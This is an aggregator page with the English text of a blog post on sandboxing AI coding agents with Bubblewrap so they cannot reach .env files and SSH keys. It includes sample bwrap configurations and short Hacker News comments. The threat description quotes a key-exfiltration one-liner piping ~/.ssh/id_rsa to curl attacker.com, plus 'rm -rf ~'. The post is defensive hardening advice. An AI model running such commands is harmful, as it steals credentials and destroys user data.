Bubblewrap:一种防止代理访问你的 .env 文件的敏捷方法。
Bubblewrap: A nimble way to prevent agents from accessing your .env files

原始链接: https://patrickmccanna.net/a-better-way-to-limit-claude-code-and-other-coding-agents-access-to-secrets/

## 使用 Bubblewrap 保护 AI 代理 本文详细介绍了一种保护 AI 编码代理(如 Claude Code)安全运行方式的转变。最初,作者建议使用具有 Unix 访问控制的专用用户帐户来防止代理访问敏感文件(例如包含密钥的 `.env` 文件)。然而,他们发现了一个更简单、更安全的解决方案:**Bubblewrap**。 Bubblewrap 允许在沙盒环境中运行不受信任的代码,而无需依赖代理的实现或供应商的安全措施。与 Docker 不同,它轻量级且不需要守护进程。它隔离了代理,防止访问敏感数据并限制系统访问。 作者提供了一个命令行示例,演示了如何创建一个最小的沙盒,限制文件系统访问和网络连接。他们还分享了一个用于运行 Claude Code 的特定 Bubblewrap 配置,使用了 `--dangerously-skip-permissions`,概述了功能所需的绑定(例如 `.nvm` 和 `.claude`),以及如何阻止访问敏感文件。 最终,作者提倡在安全方面自力更生,认为仅仅依赖供应商(如 Anthropic)会带来风险。Bubblewrap 赋予用户控制安全边界的能力,并提供了一种可适用于*所有* AI 代理(而不仅仅是 Claude Code)的通用解决方案。关键在于主动实施自己的访问控制,而不是仅仅信任代理本身。

Hacker News 新闻 | 过去 | 评论 | 提问 | 展示 | 招聘 | 提交 登录 Bubblewrap:一种防止代理访问你的 .env 文件的敏捷方法 (patrickmccanna.net) 11 分,由 0o_MrPatrick_o0 1 小时前发布 | 隐藏 | 过去 | 收藏 | 2 条评论 Nora23 4 分钟前 | 下一个 [–] 一种智能的 AI 代理安全方法。便利性和保护之间的平衡很微妙。回复 typs 13 分钟前 | 上一个 [–] 我希望有与这个相反的东西。想出新的方法让 Cursor 编辑和设置我的环境变量,绕过它们的所有阻止技术,这简直是一场竞赛!回复 指南 | 常见问题 | 列表 | API | 安全 | 法律 | 申请 YC | 联系 搜索:
相关文章

原文

Last week I wrote a thing about how to run Claude Code when you don’t trust Claude Code. I proposed the creation of a dedicated user account & standard unix access controls. The objective was to stop Claude from dancing through your .env files, eating your secrets. There are some usability problems with that guide- I found a better approach and I wanted to share.

TL;DR: Use Bubblewrap to sandbox Claude Code (and other AI agents) without trusting anyone’s implementation but your own. It’s simpler than Docker and more secure than a dedicated user account.

What Changed Since My Last Post

Immediately after publishing, I caught the flu. During three painful days in bed, I realized there are other better approaches. Firejail would likely work well- but also there’s another solution called Bubblewrap.

As I dug into Bubblewrap, I realized something else… Anthropic uses Bubblewrap!

But Anthropic embeds bubblewrap in their client. This implementation has a major disadvantage.

Embedding bubblewrap in the client means you have to trust the correctness and security of Anthropic’s implementation. They deserve credit for thinking about security, but this puzzles me. Why not publish guidance so users can secure themselves from Claude Code? Aren’t we going to need this for ALL agents? Isn’t this solution generalizable?

Defense-in-depth means we don’t rely on any single vendor to execute perfectly 100% of the time. Plus, this problem applies to all coding agents, not just Claude Code. I want an approach that doesn’t tie my security to Anthropic’s destiny.

The Security Problem We’re Solving

Before we dive into Bubblewrap, here’s what we’re protecting against:

  • You want to run a binary that will execute under your account’s permissions
  • Your account has access to sensitive files unrelated to the project you’re working on
  • You want your binary to invoke other standard system tools like lsps -aux, or less
  • We want to invoke this binary while easily preventing it from accessing sensitive files unrelated to binary’s activities

What if Claude Code has a bug? What happens if the bug is exploited, and bubblewrap constraints embedded within the client are not activated? Will Claude Code run rm -rf ~ or cat ~/.ssh/id_rsa | curl attacker.com?

Without your own wrapping of the agent, you’re at risk. When you wrap your coding agent calls with Bubblewrap, the agent’s access to dangerous commands is prevented.

What Is Bubblewrap?

Bubblewrap lets you run untrusted or semi-trusted code without risking your host system. We’re not trying to build a reproducible deployment artifact. We’re creating a jail where coding agents can work on your project while being unable to touch  ~/.aws, your browser profiles, your ~/Photos library or anything else sensitive.

Let’s explore Bubblewrap through the command line:

# Install it (Debian/Ubuntu)
sudo apt install bubblewrap

# Simplest possible sandbox - just isolate the filesystem view
bwrap --ro-bind /usr /usr --symlink usr/lib /lib --symlink usr/lib64 /lib64 \
      --symlink usr/bin /bin --proc /proc --dev /dev \
      --unshare-all --die-with-parent \
      /bin/bash

# Inside the sandbox, try:
ls /home          # Empty or nonexistent
ls /etc           # Empty or nonexistent  
whoami            # Shows "nobody" or your mapped user
ping google.com   # Fails - no network

How This Command Works

This command creates a minimal sandboxed environment. Here’s what each part does:

Filesystem access:

  • --ro-bind /usr /usr mounts your system’s /usr directory as read-only inside the sandbox
  • The --symlink commands create shortcuts so programs can find libraries and binaries in expected locations
  • --proc /proc and --dev /dev give minimal access to system processes and devices

Isolation:

  • --unshare-all disconnects the sandbox from all system resources (network, shared memory, mount points, etc.)
  • --die-with-parent kills the sandbox if your main terminal closes

The Result:

Bash runs inside a stripped-down environment. It can execute programs from /usr but can’t see your home directory, config files, or access the network. Programs work, but they’re operating in a ghost town version of your filesystem.

Why Bubblewrap Beats Docker

This beats Docker for quick workflows. Docker requires a running daemon and lots of configuration files. Bubblewrap lets you execute your app directly—no daemon, no stale containers cluttering your system.

If you’re experienced enough to worry about Docker misconfigurations, Bubblewrap gives you more control when you need it. You just run a command. No YAML files or debugging background services.

Quick Start: Running Claude Code with Bubblewrap

A big part of the reason for needing this, is –dangerously-skip-permissions. There are times when it’s very useful to give an agent autonomy in desiging, experimenting & implementing systems. Last week, I built a wifi access point that hosts a Quakeworld Server and vends web assembly quake clients. It’s an instant-lan party in a box. I did this unattended and it works. –dangerously-skip-permissions is very powerful- assuming you know how to aim it safely.

Here’s how I run Claude Code with --dangerously-skip-permissions inside a Bubblewrap sandbox:

PROJECT_DIR="$HOME/Development/YourProject"
bwrap \
     --ro-bind /usr /usr \
     --ro-bind /lib /lib \
     --ro-bind /lib64 /lib64 \
     --ro-bind /bin /bin \
     --ro-bind /etc/resolv.conf /etc/resolv.conf \
     --ro-bind /etc/hosts /etc/hosts \
     --ro-bind /etc/ssl /etc/ssl \
     --ro-bind /etc/passwd /etc/passwd \
     --ro-bind /etc/group /etc/group \
     --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
     --ro-bind "$HOME/.nvm" "$HOME/.nvm" \
     --bind "$PROJECT_DIR" "$PROJECT_DIR" \
     --bind "$HOME/.claude" "$HOME/.claude" \
     --tmpfs /tmp \
     --proc /proc \
     --dev /dev \
     --share-net \
     --unshare-pid \
     --die-with-parent \
     --chdir "$PROJECT_DIR" \
     --ro-bind /dev/null "$PROJECT_DIR/.env" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.local" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.production" \
     "$(command -v claude)" --dangerously-skip-permissions "Please review Planning/ReportingEnhancementPlan.md"

Key Configuration Lines:

# Required for Claude Code to work
--ro-bind "$HOME/.nvm" "$HOME/.nvm" \

# Claude stores auth here. Without this, you'll re-login every time
--bind "$HOME/.claude" "$HOME/.claude" \

# Only add if you understand why you need SSH access
# --ro-bind "$HOME/.ssh" "$HOME/.ssh" \

# Block access to your .env files by overlaying with empty files (You need to know exact path of files 

     --ro-bind /dev/null "$PROJECT_DIR/.env" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.local" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.production" \

Important: Most people don’t need the SSH line. It gives your agent the ability to SSH into systems where you’ve copied a public key. If you don’t understand the utility, don’t add it.

Why Not a Dedicated User Account?

My previous post proposed creating a custom user account for Claude on the host OS. This approach has three major problems:

1. ACL Tuning Becomes a Usability Nightmare

You’ll fight with file permissions constantly. You need to tune Access Control Lists to prevent access to sensitive .env files. This type of friction has killed security initiatives for decades. Security dies on usability hills.

I came up with that approach while getting sick with the flu. Please accept my apologies.

2. No Network Connectivity Restrictions

A custom account doesn’t solve the network access problem. Claude agents can spin up sockets and connect to whatever they want. Unless you run UFW and restrict outbound connectivity from your host, you risk your agent exfiltrating content.

I’ve been creating agents that remotely administer and tune servers. It’s not responsible to let agents have source:any destination:any access to your network or the Internet. One wrong prompt puts you at risk of data exfiltration. My previous solution was incomplete.

3. Docker Is the Wrong Tool

Docker solves the “it works on my machine” problem when moving code from your laptop to production servers. But most people aren’t deploying frequently enough to maintain strong Docker skills.

Setting up filesystems and networking in containers takes mental effort. If you just want to run a command safely, you shouldn’t need to install and configure a background service. People want something that works quickly without the cognitive overhead.

Why Use Your Own Bubblewrap Instead of Anthropic’s Sandbox?

Everyone makes security mistakes eventually. Claude Code is potentially dangerous. Which approach is safer?

Trust Anthropic: Hope their team never makes an implementation mistake that breaks security controls.

or

Don’t Trust Anthropic: Implement your own access controls in the operating system that constrain the binary at runtime.

There is one other big reason you should know how to leverage Bubblewrap. You need a solution for sandboxing agents that aren’t Claude Code.

Agents should never be considered trustworthy. Even when they have security controls. Put controls around them—don’t rely on agents built with models that have experienced misalignment.

A comparison of what you’re trusting with user-wrapped invocation of bubblewrap versus embedded bubblewrap in a client

Running Bubblewrap Yourself:

  • The Linux kernel’s namespace implementation
  • The Bubblewrap binary (small, auditable codebase)
  • Your own configuration (you wrote it, you understand it)
  • Your own proxy/filtering code

Using Anthropic’s Sandbox Runtime:

  • Everything above, plus:
  • Anthropic’s wrapper code and configuration choices
  • Anthropic’s filtering proxy implementation
  • Anthropic’s update/distribution mechanism (npm)
  • That Anthropic’s security interests align with yours

The Trust Matrix

Trust isn’t binary—it’s about understanding what you’re trusting and why. Here’s a quick comparison:

ThreatDIY bwrapAnthropic SRT
Claude accidentally rm -rf ~✓ Protected✓ Protected
Claude exfiltrating ~/.ssh✓ Protected✓ Protected
Supply chain attack via npm✓ Not exposed✗ Exposed
Subtle misconfiguration✗ Your risk✓ Their expertise
Agent Telemetry you don’t want sent✓ You control? Their choice
Novel bypass techniques✗ You’re on your own✓ Their team watches

So in Anthropic’s defense: this is not cut-and-dried. Most companies don’t have resources for great security teams. You have to decide whether you can own this. Many companies will be wise to rely on Anthropic’s expertise. Their reputation is on the line if someone breaks their sandbox implementation. But you’re going to be locked into Anthropic’s security model if you don’t learn how to wield bubblewrap. Pivoting to a new agent will require figuring out security there. Why not just rip the band aid off and learn bubblewrap?

Don’t trust me either!

This has been a fun writeup on trusting trust. TRUST ME!

But you shouldn’t trust me! I might be a Dog on the Internet. Maybe I’m ai slop?!

Here is some code you can use to test the bwrap container I provided for my claude usage. Note that this is invoked different- we’re not going to call claude- we’re going to call bash and pass it the test script. My test script is available here:

All you need to do is create a YourProject folder in your ~/$HOME/Development directory. Then create a sandbox-escape-test.sh in there. Fill it with the test code from my github.

Read and understand what the script does before executing it. This post is already pretty long 😀

Wrapping Up

I’m building with many agents—not just Claude Code. I need a generalized solution for sandboxing that I can apply to other agents.

Anthropic deserves attention and credit for the constraints they’re giving you. I wish they had published them in a way that doesn’t tie your security destiny to their ability to execute correctly 100% of the time.

The choice is yours: trust a vendor’s implementation, or take control of your own security boundaries. Both are valid. I might be paranoid. Are you feeling lucky?

p.s. If I ever get run over by a flaming pizza truck, here’s a handy 1 liner:

claude "Act as a security expert with a specialization in Linux system security.  Help me generate a bubblewrap script for safely invoking coding agents so they do not have access to sensitive data on my file system and appropriately manage other security risks, even though they're going to be invoked under my account's permissions.  Let's talk through everything that the agent should be able to do & access first, and then generate an appropriate bwrap script for delivering that capability.  Then let's discuss what access we should restrict."

Need help on topics related to this? I’m currently freelance! Let’s connect and build secure things at incredibly high speed:

https://www.linkedin.com/in/patrickmccanna

联系我们 contact @ memedata.com